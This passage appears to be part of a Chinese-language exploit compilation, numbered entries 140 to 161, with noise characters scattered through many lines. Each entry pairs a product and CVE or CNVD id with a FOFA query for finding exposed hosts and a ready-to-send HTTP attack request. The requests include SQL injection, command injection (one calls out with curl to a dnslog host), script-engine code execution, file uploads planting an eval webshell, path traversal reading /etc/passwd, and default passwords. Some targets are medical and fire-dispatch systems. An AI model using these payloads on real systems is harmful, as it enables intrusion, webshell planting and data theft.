GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1- w+ o3 a( P8 r( P: M4 D
Host: x.x.x.x
' j5 B3 Y2 @! Q, ]: Q2 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 @& I, m$ o: J9 r7 @1 V8 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 `! a. b7 o/ k/ `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 R8 f$ ^$ h+ U; `6 cAccept-Encoding: gzip, deflate, br. A9 k) W! D J! w5 ]- y8 q
Connection: close
% O Q1 Y3 B- I1 e+ l) E2 l. Q1 MCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk. C X$ Y& n8 W
Upgrade-Insecure-Requests: 1, ^- M' {# M9 W. Z7 h
" @' x& y3 s' M3 G- W- _# r& k) _$ ?: H1 x6 I0 K
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
) G* O3 f; j% i' XCVE-2024-2566
/ }+ z, d+ G2 E: D6 rFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"2 ?# h9 a6 b4 x. ^3 N' k0 @
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.13 S' A% X- G4 ?: ?' [( b" \$ b
Host: x.x.x.x
6 p6 e% K( z8 _/ s* C6 V( ?, R8 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ \) }* P1 w" S6 R7 N# w2 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% V+ ~$ p* ~$ m* ]7 B8 k. C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! c6 t A7 x+ KAccept-Encoding: gzip, deflate, br
1 D( ?" h V# C. c+ H& _( y8 s" [5 JConnection: close
2 W# L* {2 r0 L' B$ ~3 wCookie: authcode=h8g9
% [/ n, ]. \; V8 EUpgrade-Insecure-Requests: 1& t9 q8 i5 W% r/ X8 ]
" `$ u. L+ s0 S4 ]8 N- \6 L) k/ G3 N% @/ M: D" E% }8 O
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入0 J D3 p6 q; A
FOFA:body="指挥调度管理平台"
$ \& X6 t2 n7 Q+ kPOST /app/ext/ajax_users.php HTTP/1.14 j6 Y; a+ J9 B( ?- g
Host: your-ip4 q# F) A: x0 m
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
" X# T$ B9 l7 @Content-Type: application/x-www-form-urlencoded, ]* Z$ j, ]9 R R
; S: u0 m. |# e3 Z i `. ` K) y) N, F, B; r* m8 B8 `8 y) ~
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -" ~, k2 f+ A8 |7 j
4 X+ e+ D* U/ [; p
& N: N4 \ z g0 r" g2 F
142. CMSV6车辆监控平台系统中存在弱密码
' ~. K# j* b1 [CVE-2024-296660 _% A5 a; m* ~" H h; V- c3 E
FOFA:body="/808gps/"% v8 D6 d1 I) |
admin/admin5 Q; E' D; C% k$ U! e3 K
143. Netis WF2780 v2.1.40144 远程命令执行6 ~, T1 c) V. M9 @. m5 M/ o6 I
CVE-2024-25850
) I9 t* O9 s5 Q" S nFOFA:title='AP setup' && header='netis'
* X/ m- V9 C% s( RPAYLOAD& h/ `. Q9 Y/ \ `$ i+ {5 H
k% L3 L" E0 |9 Q
144. D-Link nas_sharing.cgi 命令注入
0 F: y; S- J- h' M( cFOFA:app="D_Link-DNS-ShareCenter"
" ] d# w7 j2 o2 A/ Jsystem参数用于传要执行的命令3 x1 `( d; I2 F- n) o
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
0 }7 r0 o3 v ^6 @+ E+ ?$ VHost: x.x.x.x
. @7 ~( O- k/ q, O: h& C' B0 F* v) I, w9 ^User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0' ]$ y& F" b+ V
Connection: close# z' Z v9 m n& J; l1 c1 X
Accept: */*
5 ^: P# g+ e* H" z" |& S h0 ^Accept-Language: en
1 M) M8 Q$ T. v. V3 V, h6 XAccept-Encoding: gzip( N, q8 h# ?$ N( z! r
' `! s1 [* {) u# h [5 b) d
" j2 A2 Y4 _- @145. Palo Alto Networks PAN-OS GlobalProtect 命令注入1 Q9 t- e+ Y, t, y, [ T: ^
CVE-2024-3400
: u8 K$ r q. E+ k2 V# E4 NFOFA:icon_hash="-631559155"
3 g* T1 A/ Y$ N+ @' h$ H$ bGET /global-protect/login.esp HTTP/1.1
+ L4 Q2 j3 u! o3 S& \: X0 G; MHost: 192.168.30.112:1005
! {. l z; x/ F6 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
6 r) k3 N; H" C3 D( u- cConnection: close
1 R# t9 v9 d4 x5 C. XCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
2 M9 ?4 o+ }( d2 @& uAccept-Encoding: gzip
/ O: ^+ c' ^! [- {, C+ i
( k* U3 S; X: S) e1 A1 S% O
; J$ Y6 r/ p+ [; a+ H( n146. MajorDoMo thumb.php 未授权远程代码执行$ v+ c$ Y' r( G- S' b/ l4 {
CNVD-2024-02175- X! C2 l& m2 ]1 [) [
FOFA:app="MajordomoSL"+ f, [1 _' L b% U5 n6 g
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.14 I e! j- i+ A4 c' C/ j$ j
Host: x.x.x.x
) M3 h7 L s9 G8 u( o7 m* aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
. d s, R0 j0 e& Z0 @" z/ p. pAccept-Charset: utf-87 U* ^4 S" {) F0 F
Accept-Encoding: gzip, deflate: }; r4 P: ]5 ]
Connection: close
% Q0 b% _( g% w( `5 f* O
+ Z6 Z$ f0 G1 o7 W o; s
5 u- {% s, q! \3 S$ W6 L6 T% G |147. RaidenMAILD邮件服务器v.4.9.4-路径遍历& N8 {! U- h X3 d: k+ r& j
CVE-2024-32399; C6 p* d0 f, X% b
FOFA:body="RaidenMAILD" ]0 r4 h( l, A. g; p; u0 D
GET /webeditor/../../../windows/win.ini HTTP/1.13 V. g2 O7 \+ ]" j$ W# O0 t
Host: 127.0.0.1:810 O9 G4 [6 {% t
Cache-Control: max-age=0
" R9 s+ t1 z; @; }* DConnection: close7 J% ]- B* P/ g+ I1 M5 u
5 ~/ p T. N& F& W
7 w# P- x5 b- U1 W9 r! E148. CrushFTP 认证绕过模板注入3 g# X$ c4 |/ n* M8 u( F5 w. v
CVE-2024-4040 M- Y& D& k) K0 Z: ~9 d; E& @
FOFA:body="CrushFTP"# K2 [/ C9 W6 C3 O' a$ }+ P) U
PAYLOAD% |& [/ T' h' F' Q. Y8 f
6 ? D8 ], L" o! N& t( D
149. AJ-Report开源数据大屏存在远程命令执行
; P% P; z! R" ^% q/ I3 J- l' WFOFA:title="AJ-Report"
* I; W( G+ t4 I( S# X
9 {3 t* E7 n! O% C+ BPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% Y7 f" Q. A- Y1 @Host: x.x.x.x; Y5 y. h- U' G0 D! g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 V: T3 ^3 w1 [, aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% E3 `5 M8 l% |
Accept-Encoding: gzip, deflate, br. N, a3 O( \$ K& c- L @0 T; {
Accept-Language: zh-CN,zh;q=0.9
( p& `' w' i3 _" MContent-Type: application/json;charset=UTF-8+ A. Z8 @; j |) x
Connection: close
+ P7 r6 W# B; |" ~% d* D$ [ w' }2 j0 q, Y# A1 C3 S
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}: E6 W/ F( i5 \; ?
# [5 F: f" ]: s3 b4 L8 [
150. AJ-Report 1.4.0 认证绕过与远程代码执行% O9 j) O, ?- B9 r3 ~
FOFA:title="AJ-Report"0 K/ e/ P: P8 W5 r4 A
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
: u7 B; X5 `) l1 fHost: x.x.x.x7 D9 m1 B2 S4 h. f6 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 k- k5 I6 C' {. f2 X1 C1 Q! rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: h1 m( h- t9 o O; v7 o: QAccept-Encoding: gzip, deflate, br: D& C# B/ D) c+ ]
Accept-Language: zh-CN,zh;q=0.98 E5 k, w* C, W. \: ~5 g
Content-Type: application/json;charset=UTF-81 L& P! n" M3 t4 }# n( ]. u
Connection: close/ e8 |5 S K8 r+ m$ M
Content-Length: 3394 s% z8 x) F" C. P4 H7 Z
4 D7 Z4 `" Q% {3 d9 V. \# B{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}0 D; U& n0 x8 B4 }2 h- d4 b- W
1 V% @: A9 e- k2 N, { s8 t7 d0 m& ^
/ {1 [& I( J/ S; P% q151. AJ-Report 1.4.1 pageList sql注入
, i! f1 T& l, x9 L$ r* S; Y7 sFOFA:title="AJ-Report"; P/ }7 I/ t4 H0 c9 @: Q+ P' J" H
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1, e$ w! v* q# V2 q8 {5 z# P3 g3 o
Host: x.x.x.x
1 b% U2 O( x- Q' i4 B" a7 g/ A% d- |2 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* D' [; L9 h. v! j" T
Connection: close
- N& I- f6 L% z* c0 l5 bAccept-Encoding: gzip
& Y2 T4 t2 m4 J
2 p! l* |. C; e. ~
" k0 C: C' ^4 D; o% P152. Progress Kemp LoadMaster 远程命令执行
5 G" `8 b; v8 h1 Y$ d! t1 JCVE-2024-1212; u7 }& n7 M6 @! m/ _; |
LoadMaster <= 7.2.59.2 (GA)# z: M! q6 H; C4 T& v+ P: j
LoadMaster<=7.2.54.8 (LTSF)
2 r" i* G0 d) aLoadMaster <= 7.2.48.10 (LTS)
4 @0 D. {- k( |* U5 y- U' l0 iFOFA:body="LoadMaster"5 D! v1 I; D& K! K7 F4 X
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码3 E) z+ l2 l! K% `$ j# _; I
GET /access/set?param=enableapi&value=1 HTTP/1.1! x7 G# P, ~- y: t& ?
Host: x.x.x.x/ \( D6 U8 C4 ~3 b' H+ Q V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
1 w. D4 ?( q2 q ]# V. Q5 F1 _Connection: close
x% ?2 N3 c9 d+ p4 D, A) mAccept: */*
. C5 i! C6 N! J( ^5 BAccept-Language: en
# `. h1 a& k( U% S8 KAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
/ @, @ X2 F4 B! T; LAccept-Encoding: gzip7 x8 K# T9 ^& m5 J' V1 X1 H
8 {# s ~! E g
7 E" b" l+ [3 H2 C+ Z5 J2 D
153. gradio任意文件读取! a5 e. \7 o- U/ T9 x
CVE-2024-1561FOFA:body="__gradio_mode__"8 c& C1 l5 o& y4 {/ P
第一步,请求/config文件获取componets的id, Q$ \: P6 U; R1 M
http://x.x.x.x/config
$ o* X7 q3 V% q! ^8 @
, k5 m- g% [3 T; H* A6 A7 A+ C1 u
; ?, r& m; ]$ `- j# C. m; o第二步,将/etc/passwd的内容写入到一个临时文件# d/ C' t" B$ z: b5 J! j4 ~$ k/ O
POST /component_server HTTP/1.13 N1 u+ R9 Q2 C: y# ^4 a, ]/ H/ _
Host: x.x.x.x
. I( ?( G" w* w9 c9 ~& c, vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
q4 i; K: X1 j, V8 h* S% _9 X* yConnection: close4 [1 I$ n7 H! }" G# `1 q! A! M
Content-Length: 115 u8 C( A, G3 o9 t X
Content-Type: application/json
1 S% R, w2 |) m# T7 rAccept-Encoding: gzip2 L j; ]4 K( z) ^, T9 v9 n& X! Y
: {: X2 M1 L+ s( C, X: R{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
3 l& S" Y% A, t6 t O$ t+ K3 p' g# G! ?( f4 b
. A3 h7 s2 r% \% d# ^# X3 ?/ r9 Y第三步访问
' m2 K% t* K H+ nhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
+ v$ Q6 S C' I
% e& ~+ R7 e0 l0 z" U0 }
& p3 s3 c( L' q2 \. y0 l154. 天维尔消防救援作战调度平台 SQL注入
q4 t: D4 t5 M! i$ ]CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
! g: v" o& p8 n8 l3 N# GPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
2 u0 j, P6 y" h; @' A* H% i/ lHost: x.x.x.x
2 ~7 v% v1 U3 \1 E# _* H3 YContent-Length: 1064 Q* u# m7 P6 e" K) t* E
Cache-Control: max-age=0+ i% k. c$ p$ G4 A4 L
Upgrade-Insecure-Requests: 1
* F. |4 h$ E& c" b% r$ T4 AOrigin: http://x.x.x.x0 y3 @( b* o8 s# u
Content-Type: application/json9 }* l; x! g" o/ j1 T; u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
' S: W) {% i: D3 R' xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ I+ }! c, x- N4 A2 a5 ?
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page/ s' s, j# J% U- [+ f- c$ V
Accept-Encoding: gzip, deflate* d4 x9 W; A B; v+ L1 o* b
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7% g, ` O t2 _) L0 Z
Connection: close
4 w7 m. W* r7 s& V" K3 ^" a2 A' s$ x1 J$ T
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
! ]$ J, {& y& f# } [; V2 I* }- a& A3 `) J! n
}5 `: V1 g \7 T. p' m/ j155. 六零导航页 file.php 任意文件上传
$ |! \- ?, i8 t+ O% t o9 pCVE-2024-34982
. {" R9 U; X8 GFOFA:title=="上网导航 - LyLme Spage") O4 v/ C' W. A+ b; }# \2 H# W% ^
POST /include/file.php HTTP/1.1' M5 t8 n4 O0 c. P
Host: x.x.x.x
) g1 q: y# C) |' k7 f* w2 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0) B. e9 z V8 o! u
Connection: close
9 Y8 f8 g- s% u, NContent-Length: 232# x( t4 z. t5 E. ~
Accept: application/json, text/javascript, */*; q=0.01
9 }* e1 S0 g% b* Q1 [- rAccept-Encoding: gzip, deflate, br0 {) l* t/ u" g! e, ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; M% W; h* @1 i& e b9 \4 M3 o6 P
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
) ~; J1 @1 E y/ T6 bX-Requested-With: XMLHttpRequest1 H- f- i. ]9 L
0 s- j! O( l/ A' G0 M-----------------------------qttl7vemrsold314zg0f
) p" _% H" G3 ~. FContent-Disposition: form-data; name="file"; filename="test.php"2 M2 ~- ` a5 | {$ l
Content-Type: image/png2 s* Z `; M7 V9 B, p4 L- A
5 x* m: O7 J1 |; M) J+ L. i. a<?php phpinfo();unlink(__FILE__);?>- b6 ]" }: f I, J5 O J
-----------------------------qttl7vemrsold314zg0f--" b/ L1 T- m; }! \
3 f$ |# Z' t! P: X& R
6 u& K9 ~( l0 X' j8 _访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
4 b6 Y3 W3 f: r3 d% E7 |6 A
5 ^9 A% {$ }- W/ D2 ^156. TBK DVR-4104/DVR-4216 操作系统命令注入
" O Y( I# D/ M( kCVE-2024-3721* K# e; X& Z1 R. a2 h0 |4 a
FOFA:"Location: /login.rsp"+ f9 R2 a3 N* a! w1 \/ ?* h
·TBK DVR-4104* \+ Y# B% J# X' C
·TBK DVR-4216- g/ e* l8 p9 D) \5 _$ {
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
& }, o" ~! \4 u9 C; O: @+ k9 b
C% ~) T/ \4 N
1 m) W. G/ [3 H+ g, z* { pPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1! _6 z. S7 r6 v) Z
Host: x.x.x.x
5 j) T( Q# d, j5 dUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 j' s; }# v6 R/ j
Connection: close
, {; Y. y; p7 H8 [Content-Length: 0
4 l, g0 m+ ~8 p( X1 F. H7 l lCookie: uid=1
2 ^# i5 E; U9 n5 W9 M6 j6 hAccept-Encoding: gzip
0 y/ |" U5 w+ f7 w& E4 a' @5 `
( U5 M- ^; j$ ~* r. [" [! p" c9 s9 ?5 t3 b; P/ Z# E1 j9 w
157. 美特CRM upload.jsp 任意文件上传
- J- E6 d0 j, y+ U8 HCNVD-2023-06971
6 {! O" ^9 q- s" s7 sFOFA:body="/common/scripts/basic.js"
+ U7 o5 A# [ b. ?- U, _POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
1 k1 A- ^8 Y0 G) A5 ~* hHost: x.x.x.x
/ @ i) n6 \( D, a) b x$ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
* N, ^2 V" P5 K( ^ qContent-Length: 7097 i0 Q2 J; t* P' F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 D- c A! W+ c9 i. o$ sAccept-Encoding: gzip, deflate
, X$ @6 k2 W! U& pAccept-Language: zh-CN,zh;q=0.9
. |9 ~$ \8 m8 }. i, P1 p; aCache-Control: max-age=0
% ~8 O( U) a2 j1 b' ~3 D) w* K3 RConnection: close
6 u0 q* T9 k- v# TContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN$ M" Y. D, o6 x- u! I9 W$ v
Upgrade-Insecure-Requests: 1! w8 G* X* v# {2 T; s$ H
, j( \& V. U- L R# P
------WebKitFormBoundary1imovELzPsfzp5dN' d T2 t b+ u1 [- } e' ~' b
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
% |* C1 o S9 t5 T- vContent-Type: application/octet-stream( R" i( i, v( L; w/ c3 g+ h
5 r& c1 C: f. ]# H @
nyhelxrutzwhrsvsrafb
) j) Y7 x' t1 h# c. s8 C) ]+ p------WebKitFormBoundary1imovELzPsfzp5dN r7 I# n+ [2 {( U0 J- |
Content-Disposition: form-data; name="key"
4 u1 g" B9 z, u$ [. K5 }8 d
6 {5 V ]1 L; Qnull
$ I# C+ A! n4 q# E4 r$ x) U- d------WebKitFormBoundary1imovELzPsfzp5dN
5 b: v) K$ Y1 g* L/ i4 M2 HContent-Disposition: form-data; name="form"
4 [ I" U. \2 q$ g! \" G! q% T2 W0 ?. V ]) k
null9 p+ Z* W. L3 U) V
------WebKitFormBoundary1imovELzPsfzp5dN
2 O. F, W" v2 ]Content-Disposition: form-data; name="field"5 Z4 D. ^5 v2 K- P( m, I% ~# Y
4 n! R! C& C. X: j/ i3 P
null8 J% n8 ]6 p3 E
------WebKitFormBoundary1imovELzPsfzp5dN
" [+ w" E( h `- S, vContent-Disposition: form-data; name="filetitile". z7 q! Q# l6 U0 C2 w
H$ w7 [& C5 t! E% Inull; x" O0 H% P: T. I
------WebKitFormBoundary1imovELzPsfzp5dN, F& }7 U7 P2 T: }/ U" ~; c
Content-Disposition: form-data; name="filefolder"( s1 I1 ?. U# |" N+ ^
2 c2 j: Q5 U" d; d8 g4 z& ?( m
null
! O( t; {9 ^5 _ [/ o------WebKitFormBoundary1imovELzPsfzp5dN--
. ?. @6 C2 D5 g3 t( P4 X9 P# x# {" R& k3 X7 W7 _+ Y7 C
# X. i3 B( N, _; ~
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
I0 O0 q! I9 O& T
) ?& l5 [9 R8 S7 x8 l5 |$ h D158. Mura-CMS-processAsyncObject存在SQL注入
- {; o+ g' H7 u0 [6 aCVE-2024-32640
$ p$ c1 C; e: J' ^4 q. a6 mFOFA:"Generator: Masa CMS"
# Y; y3 a8 A* q0 }# a" GPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.11 p. u& X' K/ D: `6 }$ A
Host: {{Hostname}}
" E5 q! H: ~7 J* @# D1 V9 nContent-Type: application/x-www-form-urlencoded
% O* ^, X/ K4 ~1 C0 ?# A$ T' o
# X7 w( s5 C" l/ D$ F2 ~object=displayregion&contenthistid=x\'&previewid=14 U* Z$ K( l( }; v1 |
' u3 ^! |6 ^6 a( x6 P T# d# n q1 D6 X
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传' @8 u0 s) j/ H
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")% R% f4 M4 c! W) ]6 K* @" u3 ?6 r$ e
POST /webservices/WebJobUpload.asmx HTTP/1.1
, L3 [2 D" h- ~Host: x.x.x.x
; z2 O" B% F$ ?. t5 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.369 ? y" g" e9 j3 t& q
Content-Length: 1080. I: a& T- G+ V6 t8 a8 Q
Accept-Encoding: gzip, deflate
1 [( v1 Q# n+ x E, j. F% X6 |1 FConnection: close3 l: T( a+ i$ g+ @8 m; r
Content-Type: text/xml; charset=utf-87 X" a; h% j, [3 q l
Soapaction: "http://rainier/jobUpload"
4 v k5 o4 E# \9 \- ^
8 S7 Y: H7 M9 V<?xml version="1.0" encoding="utf-8"?>6 Z+ v$ J: Z: w. v0 w3 ]
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' f# U. L5 e& }<soap:Body>
+ R1 d6 }- U1 s8 _<jobUpload xmlns="http://rainier">
) M+ ]) f" b7 s1 B5 W0 K' p+ x6 R<vcode>1</vcode>) k% P7 N7 O) a; Q# G0 G0 Y$ ]
<subFolder></subFolder>
9 R0 L- p7 R! h. k" O$ ^& Z9 F<fileName>abcrce.asmx</fileName>
/ f' H/ k5 J3 p Q" Y<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
6 R- x1 L. K. M# @* O</jobUpload>; q3 w% I1 [# o5 b' d
</soap:Body>7 K$ p: m' P8 `! m$ k6 R0 Q+ F
</soap:Envelope>4 q* [6 ?0 I5 F- s- G
, G W+ L( `' Z( W6 P
8 P7 v- }4 _$ e! \# h4 F
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
% T6 y9 ^7 f. ~% V- N! \
; @" P! n6 k, M5 }4 o- P% {: Y3 h/ h7 D+ S: Q* }) c. \2 a
160. Sonatype Nexus Repository 3目录遍历与文件读取8 j- Q# o, F" c) N" t& W# z
CVE-2024-4956' T: @( q6 U N. s6 O- R
FOFA:title="Nexus Repository Manager"
# }! e' G5 y/ ]$ P- t5 CGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
! S2 H5 s' [. Z- H1 p) T8 ]6 WHost: x.x.x.x
" ]$ Y6 v7 p! D" o; i9 dUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
/ a' y/ N, t# H0 _( lConnection: close& f- u( ]2 v/ h9 U5 p
Accept: */*8 ~9 Q+ _. X4 S
Accept-Language: en
3 B" g& I# I/ {Accept-Encoding: gzip
4 @ X( U R2 ~1 _# y; b I- O9 F9 K( [- u7 _ U* L
. _/ h8 v! X1 `7 j4 ^
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传9 T. T" M4 D6 _& i- h! D
FOFA:body="/KT_Css/qd_defaul.css"1 B7 A( d0 @2 ^
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密" }3 p0 k0 k$ ]; \
POST /Webservice.asmx HTTP/1.1
( Q0 X8 K2 K2 z+ r, bHost: x.x.x.x
. U6 d. Q' Z2 Y3 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) z! T' r6 `( f
Connection: close0 `* E1 e' k( Q9 G: r2 y
Content-Length: 445/ T+ T: T2 A* a$ ~
Content-Type: text/xml
# E/ E4 d) N2 sAccept-Encoding: gzip
. Z( p9 i) |& [$ I) L4 p1 u1 v9 i. \# A
<?xml version="1.0" encoding="utf-8"?>0 |) }3 w8 K6 y& k
<soap:Envelope xmlns:xsi="
$ o; h9 {) e! Z4 d# M) ehttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema") L' d8 s4 E. b+ f% B+ ]
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
8 a1 }" n; ~3 H, j" O<soap:Body>+ U2 q; @# ~1 H. f. _! K
<UploadResume xmlns="http://tempuri.org/">; M9 e% L- {# K( b- n8 e' @' s
<ip>1</ip>
- m# w' E0 I1 D3 T<fileName>../../../../dizxdell.aspx</fileName>- a( \3 Y5 Y& H, J
